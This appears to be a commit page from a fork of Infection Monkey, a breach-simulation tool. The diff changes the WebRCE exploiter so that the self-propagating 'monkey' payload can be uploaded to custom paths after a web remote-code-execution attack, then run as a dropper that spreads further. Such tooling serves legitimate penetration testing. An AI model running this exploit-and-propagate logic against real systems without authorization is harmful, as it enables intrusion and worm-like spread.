p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

Web_RCE framework now supports custom monkey uploading paths( we don't always have permissions to uppload to C:\Windows)

This commit is contained in:
Vakaris 2018-08-17 13:53:09 +03:00
parent b8bda692b9
commit 5565a80418
1 changed files with 62 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

68
infection_monkey/exploit/web_rce.py
View File

@ -17,9 +17,19 @@ LOOK_FOR_FILE = "ls %s"
class WebRCE(HostExploiter): class WebRCE(HostExploiter):
def __init__(self, host): def __init__(self, host, monkey_target_paths=None):
"""
:param host: Host that we'll attack
:param monkey_target_paths: Dict in format {'linux': '/tmp/monkey.sh', 'win32': './monkey32.exe', 'win64':... }
"""
super(WebRCE, self).__init__(host) super(WebRCE, self).__init__(host)
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration
if monkey_target_paths:
self.monkey_target_paths = monkey_target_paths
else:
self.monkey_target_paths = {'linux': self._config.dropper_target_path_linux,
'win32': self._config.dropper_target_path_win_32,
'win64': self._config.dropper_target_path_win_64}
self.HTTP = [str(port) for port in self._config.HTTP_PORTS] self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist self.skip_exist = self._config.skip_exploit_if_file_exist
@ -87,7 +97,7 @@ class WebRCE(HostExploiter):
candidate_services = {} candidate_services = {}
candidate_services.update({ candidate_services.update({
service: self.host.services[service] for service in self.host.services if service: self.host.services[service] for service in self.host.services if
(self.host.services[service]['name'] in names) (self.host.services[service] and self.host.services[service]['name'] in names)
}) })
valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if
@ -205,9 +215,9 @@ class WebRCE(HostExploiter):
""" """
paths = [] paths = []
if 'linux' in self.host.os['type']: if 'linux' in self.host.os['type']:
paths.append(self._config.dropper_target_path_linux) paths.append(self.monkey_target_paths['linux'])
else: else:
paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64]) paths.extend([self.monkey_target_paths['win32'], self.monkey_target_paths['win64']])
for path in paths: for path in paths:
if self.check_remote_monkey_file(url, path): if self.check_remote_monkey_file(url, path):
return True return True
@ -251,7 +261,7 @@ class WebRCE(HostExploiter):
return False return False
# Determine which destination path to use # Determine which destination path to use
LOG.debug("Monkey path found") LOG.debug("Monkey path found")
path = get_monkey_dest_path(src_path) path = self.get_monkey_upload_path(src_path)
if not path: if not path:
return False return False
# Create server for http download and wait for it's startup. # Create server for http download and wait for it's startup.
@ -323,7 +333,11 @@ class WebRCE(HostExploiter):
LOG.info("Trying to execute remote monkey") LOG.info("Trying to execute remote monkey")
# Get monkey command line # Get monkey command line
if dropper and path: if dropper and path:
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path) # If dropper is chosen we try to move monkey to default location
default_path = self.custom_to_dropper_path(path)
if default_path is False:
return False
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd} command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
else: else:
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1) monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
@ -346,3 +360,45 @@ class WebRCE(HostExploiter):
return False return False
LOG.info("Execution attempt finished") LOG.info("Execution attempt finished")
return resp return resp
def get_monkey_upload_path(self, url_to_monkey):
"""
Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
:param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
:return: Corresponding monkey path from self.monkey_target_paths
"""
if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey):
LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey)
return False
try:
if 'linux' in url_to_monkey:
return self.monkey_target_paths['linux']
elif 'windows-32' in url_to_monkey:
return self.monkey_target_paths['win32']
elif 'windows-64' in url_to_monkey:
return self.monkey_target_paths['win64']
else:
LOG.error("Could not figure out what type of monkey server was trying to upload, "
"thus destination path can not be chosen.")
return False
except AttributeError:
LOG.error("Seems like monkey's source configuration property names changed. "
"Can not get destination path to upload monkey")
return False
def custom_to_dropper_path(self, path):
try:
key = self.monkey_target_paths.keys()[self.monkey_target_paths.values().index(path)]
except KeyError:
LOG.error("The path you used is not in monkey_target_paths array. Skipping")
return False
if key == 'linux':
return self._config.dropper_target_path_linux
elif key == 'win32':
return self._config.dropper_target_path_win_32
elif key == 'win64':
return self._config.dropper_target_path_win_64
else:
LOG.error("Unknown key was found. Please use \"linux\", \"win32\" and \"win64\" keys to initialize "
"custom dict of monkey's destination paths")
return False